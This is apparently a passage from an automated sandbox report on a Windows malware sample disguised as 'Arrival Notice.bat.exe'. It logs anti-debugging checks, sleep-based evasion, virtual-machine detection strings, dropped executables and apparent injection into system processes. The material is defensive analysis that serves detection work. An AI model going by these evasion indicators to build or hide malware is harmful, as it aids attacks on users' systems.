              Source: C:\Windows\SysWOW64\compact.exe API/Special instruction interceptor: Address: 7FFE2220DA44
              Source: C:\Windows\SysWOW64\runonce.exe API/Special instruction interceptor: Address: 7FFE2220D324
              Source: C:\Windows\SysWOW64\runonce.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
              Source: C:\Windows\SysWOW64\runonce.exe API/Special instruction interceptor: Address: 7FFE2220D944
              Source: C:\Windows\SysWOW64\runonce.exe API/Special instruction interceptor: Address: 7FFE2220D504
              Source: C:\Windows\SysWOW64\runonce.exe API/Special instruction interceptor: Address: 7FFE2220D544
              Source: C:\Windows\SysWOW64\runonce.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
              Source: C:\Windows\SysWOW64\runonce.exe API/Special instruction interceptor: Address: 7FFE22210154
              Source: C:\Windows\SysWOW64\runonce.exe API/Special instruction interceptor: Address: 7FFE2220DA44
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Memory allocated: 1300000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Memory allocated: 2F90000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Memory allocated: 1530000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Memory allocated: 8370000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Memory allocated: 9370000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Memory allocated: 9540000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Memory allocated: A540000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe Memory allocated: F10000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe Memory allocated: 28B0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe Memory allocated: 48B0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe Memory allocated: 78D0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe Memory allocated: 88D0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe Memory allocated: 8A90000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe Memory allocated: 9A90000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe Memory allocated: A50000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe Memory allocated: 2420000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe Memory allocated: 4420000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe Memory allocated: 8670000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe Memory allocated: 7FE0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe Memory allocated: 8670000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Code function: 8_2_015B096E rdtsc 8_2_015B096E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeWindow / User API: threadDelayed 703Jump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeWindow / User API: threadDelayed 933Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2304Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4416Jump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeWindow / User API: threadDelayed 996Jump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeWindow / User API: threadDelayed 391Jump to behavior
              Source: C:\Windows\SysWOW64\compact.exeWindow / User API: threadDelayed 9832
              Source: C:\Windows\SysWOW64\runonce.exeWindow / User API: threadDelayed 9973
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeAPI coverage: 0.7 %
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeAPI coverage: 0.2 %
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe TID: 3624 Thread sleep time: -7378697629483816s >= -30000s
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe TID: 5480 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7460 Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7404 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7480 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe TID: 7660 Thread sleep time: -8301034833169293s >= -30000s
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe TID: 7652 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\compact.exe TID: 8116 Thread sleep count: 141 > 30
              Source: C:\Windows\SysWOW64\compact.exe TID: 8116 Thread sleep time: -282000s >= -30000s
              Source: C:\Windows\SysWOW64\compact.exe TID: 8116 Thread sleep count: 9832 > 30
              Source: C:\Windows\SysWOW64\compact.exe TID: 8116 Thread sleep time: -19664000s >= -30000s
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe TID: 8144 Thread sleep time: -90000s >= -30000s
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe TID: 8144 Thread sleep time: -45000s >= -30000s
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe TID: 8144 Thread sleep count: 45 > 30
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe TID: 8144 Thread sleep time: -45000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe TID: 7808 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\runonce.exe TID: 1732 Thread sleep count: 9973 > 30
              Source: C:\Windows\SysWOW64\runonce.exe TID: 1732 Thread sleep time: -19946000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Windows\SysWOW64\runonce.exe Last function: Thread delayed
              Source: C:\Windows\SysWOW64\runonce.exe Last function: Thread delayed
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe Thread delayed: delay time: 922337203685477
              Source: compact.exe, 00000012.00000002.4143560755.000000000263A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
              Source: Arrival Notice.bat.exe, 00000000.00000002.1706088300.00000000011A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: compact.exe, 00000012.00000002.4143560755.000000000255D000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000012.00000002.4150230985.0000000007820000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4144211705.0000000001270000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
              Source: firefox.exe, 00000014.00000002.2340102234.00000260728BC000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4143575378.000000000099A000.00000004.00000020.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 0000001B.00000002.4144762086.0000000000B60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: firefox.exe, 0000001C.00000002.3809126209.000001628853C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRRZ
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Process queried: DebugPort
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe Process queried: DebugPort
              Source: C:\Windows\SysWOW64\compact.exe Process queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe Process queried: DebugPort
              Source: C:\Windows\SysWOW64\runonce.exe Process queried: DebugPort
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Code function: 8_2_015B096E rdtsc 8_2_015B096E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe Code function: 8_2_00417933 LdrLoadDll, 8_2_00417933
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01644500 mov eax, dword ptr fs:[00000030h]8_2_01644500
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01644500 mov eax, dword ptr fs:[00000030h]8_2_01644500
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01644500 mov eax, dword ptr fs:[00000030h]8_2_01644500
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01644500 mov eax, dword ptr fs:[00000030h]8_2_01644500
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01644500 mov eax, dword ptr fs:[00000030h]8_2_01644500
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01644500 mov eax, dword ptr fs:[00000030h]8_2_01644500
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E53E mov eax, dword ptr fs:[00000030h]8_2_0159E53E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E53E mov eax, dword ptr fs:[00000030h]8_2_0159E53E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E53E mov eax, dword ptr fs:[00000030h]8_2_0159E53E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E53E mov eax, dword ptr fs:[00000030h]8_2_0159E53E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E53E mov eax, dword ptr fs:[00000030h]8_2_0159E53E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580535 mov eax, dword ptr fs:[00000030h]8_2_01580535
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580535 mov eax, dword ptr fs:[00000030h]8_2_01580535
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580535 mov eax, dword ptr fs:[00000030h]8_2_01580535
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580535 mov eax, dword ptr fs:[00000030h]8_2_01580535
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580535 mov eax, dword ptr fs:[00000030h]8_2_01580535
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580535 mov eax, dword ptr fs:[00000030h]8_2_01580535
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015765D0 mov eax, dword ptr fs:[00000030h]8_2_015765D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AA5D0 mov eax, dword ptr fs:[00000030h]8_2_015AA5D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AA5D0 mov eax, dword ptr fs:[00000030h]8_2_015AA5D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE5CF mov eax, dword ptr fs:[00000030h]8_2_015AE5CF
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE5CF mov eax, dword ptr fs:[00000030h]8_2_015AE5CF
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015725E0 mov eax, dword ptr fs:[00000030h]8_2_015725E0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AC5ED mov eax, dword ptr fs:[00000030h]8_2_015AC5ED
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AC5ED mov eax, dword ptr fs:[00000030h]8_2_015AC5ED
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E5E7 mov eax, dword ptr fs:[00000030h]8_2_0159E5E7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E5E7 mov eax, dword ptr fs:[00000030h]8_2_0159E5E7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E5E7 mov eax, dword ptr fs:[00000030h]8_2_0159E5E7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E5E7 mov eax, dword ptr fs:[00000030h]8_2_0159E5E7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E5E7 mov eax, dword ptr fs:[00000030h]8_2_0159E5E7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E5E7 mov eax, dword ptr fs:[00000030h]8_2_0159E5E7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E5E7 mov eax, dword ptr fs:[00000030h]8_2_0159E5E7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159E5E7 mov eax, dword ptr fs:[00000030h]8_2_0159E5E7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE59C mov eax, dword ptr fs:[00000030h]8_2_015AE59C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A4588 mov eax, dword ptr fs:[00000030h]8_2_015A4588
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01572582 mov eax, dword ptr fs:[00000030h]8_2_01572582
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01572582 mov ecx, dword ptr fs:[00000030h]8_2_01572582
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015945B1 mov eax, dword ptr fs:[00000030h]8_2_015945B1
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015945B1 mov eax, dword ptr fs:[00000030h]8_2_015945B1
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F05A7 mov eax, dword ptr fs:[00000030h]8_2_015F05A7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F05A7 mov eax, dword ptr fs:[00000030h]8_2_015F05A7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F05A7 mov eax, dword ptr fs:[00000030h]8_2_015F05A7
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159245A mov eax, dword ptr fs:[00000030h]8_2_0159245A
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156645D mov eax, dword ptr fs:[00000030h]8_2_0156645D
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE443 mov eax, dword ptr fs:[00000030h]8_2_015AE443
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE443 mov eax, dword ptr fs:[00000030h]8_2_015AE443
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE443 mov eax, dword ptr fs:[00000030h]8_2_015AE443
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE443 mov eax, dword ptr fs:[00000030h]8_2_015AE443
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE443 mov eax, dword ptr fs:[00000030h]8_2_015AE443
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE443 mov eax, dword ptr fs:[00000030h]8_2_015AE443
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE443 mov eax, dword ptr fs:[00000030h]8_2_015AE443
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AE443 mov eax, dword ptr fs:[00000030h]8_2_015AE443
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159A470 mov eax, dword ptr fs:[00000030h]8_2_0159A470
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159A470 mov eax, dword ptr fs:[00000030h]8_2_0159A470
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159A470 mov eax, dword ptr fs:[00000030h]8_2_0159A470
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0162A456 mov eax, dword ptr fs:[00000030h]8_2_0162A456
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015FC460 mov ecx, dword ptr fs:[00000030h]8_2_015FC460
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A8402 mov eax, dword ptr fs:[00000030h]8_2_015A8402
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A8402 mov eax, dword ptr fs:[00000030h]8_2_015A8402
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A8402 mov eax, dword ptr fs:[00000030h]8_2_015A8402
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156C427 mov eax, dword ptr fs:[00000030h]8_2_0156C427
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156E420 mov eax, dword ptr fs:[00000030h]8_2_0156E420
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156E420 mov eax, dword ptr fs:[00000030h]8_2_0156E420
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156E420 mov eax, dword ptr fs:[00000030h]8_2_0156E420
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F6420 mov eax, dword ptr fs:[00000030h]8_2_015F6420
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F6420 mov eax, dword ptr fs:[00000030h]8_2_015F6420
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F6420 mov eax, dword ptr fs:[00000030h]8_2_015F6420
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F6420 mov eax, dword ptr fs:[00000030h]8_2_015F6420
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F6420 mov eax, dword ptr fs:[00000030h]8_2_015F6420
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F6420 mov eax, dword ptr fs:[00000030h]8_2_015F6420
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F6420 mov eax, dword ptr fs:[00000030h]8_2_015F6420
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015704E5 mov ecx, dword ptr fs:[00000030h]8_2_015704E5
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A44B0 mov ecx, dword ptr fs:[00000030h]8_2_015A44B0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015FA4B0 mov eax, dword ptr fs:[00000030h]8_2_015FA4B0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0162A49A mov eax, dword ptr fs:[00000030h]8_2_0162A49A
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015764AB mov eax, dword ptr fs:[00000030h]8_2_015764AB
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015FE75D mov eax, dword ptr fs:[00000030h]8_2_015FE75D
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01570750 mov eax, dword ptr fs:[00000030h]8_2_01570750
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F4755 mov eax, dword ptr fs:[00000030h]8_2_015F4755
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2750 mov eax, dword ptr fs:[00000030h]8_2_015B2750
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2750 mov eax, dword ptr fs:[00000030h]8_2_015B2750
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A674D mov esi, dword ptr fs:[00000030h]8_2_015A674D
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A674D mov eax, dword ptr fs:[00000030h]8_2_015A674D
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A674D mov eax, dword ptr fs:[00000030h]8_2_015A674D
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01578770 mov eax, dword ptr fs:[00000030h]8_2_01578770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01580770 mov eax, dword ptr fs:[00000030h]8_2_01580770
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01570710 mov eax, dword ptr fs:[00000030h]8_2_01570710
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A0710 mov eax, dword ptr fs:[00000030h]8_2_015A0710
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AC700 mov eax, dword ptr fs:[00000030h]8_2_015AC700
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A273C mov eax, dword ptr fs:[00000030h]8_2_015A273C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A273C mov ecx, dword ptr fs:[00000030h]8_2_015A273C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A273C mov eax, dword ptr fs:[00000030h]8_2_015A273C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EC730 mov eax, dword ptr fs:[00000030h]8_2_015EC730
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AC720 mov eax, dword ptr fs:[00000030h]8_2_015AC720
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AC720 mov eax, dword ptr fs:[00000030h]8_2_015AC720
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157C7C0 mov eax, dword ptr fs:[00000030h]8_2_0157C7C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F07C3 mov eax, dword ptr fs:[00000030h]8_2_015F07C3
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015747FB mov eax, dword ptr fs:[00000030h]8_2_015747FB
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015747FB mov eax, dword ptr fs:[00000030h]8_2_015747FB
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015927ED mov eax, dword ptr fs:[00000030h]8_2_015927ED
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015927ED mov eax, dword ptr fs:[00000030h]8_2_015927ED
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015927ED mov eax, dword ptr fs:[00000030h]8_2_015927ED
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015FE7E1 mov eax, dword ptr fs:[00000030h]8_2_015FE7E1
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016247A0 mov eax, dword ptr fs:[00000030h]8_2_016247A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161678E mov eax, dword ptr fs:[00000030h]8_2_0161678E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015707AF mov eax, dword ptr fs:[00000030h]8_2_015707AF
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163866E mov eax, dword ptr fs:[00000030h]8_2_0163866E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0163866E mov eax, dword ptr fs:[00000030h]8_2_0163866E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158C640 mov eax, dword ptr fs:[00000030h]8_2_0158C640
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A2674 mov eax, dword ptr fs:[00000030h]8_2_015A2674
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AA660 mov eax, dword ptr fs:[00000030h]8_2_015AA660
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015AA660 mov eax, dword ptr fs:[00000030h]8_2_015AA660
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2619 mov eax, dword ptr fs:[00000030h]8_2_015B2619
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158260B mov eax, dword ptr fs:[00000030h]8_2_0158260B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158260B mov eax, dword ptr fs:[00000030h]8_2_0158260B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158260B mov eax, dword ptr fs:[00000030h]8_2_0158260B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158260B mov eax, dword ptr fs:[00000030h]8_2_0158260B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158260B mov eax, dword ptr fs:[00000030h]8_2_0158260B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158260B mov eax, dword ptr fs:[00000030h]8_2_0158260B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158260B mov eax, dword ptr fs:[00000030h]8_2_0158260B
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EE609 mov eax, dword ptr fs:[00000030h]8_2_015EE609
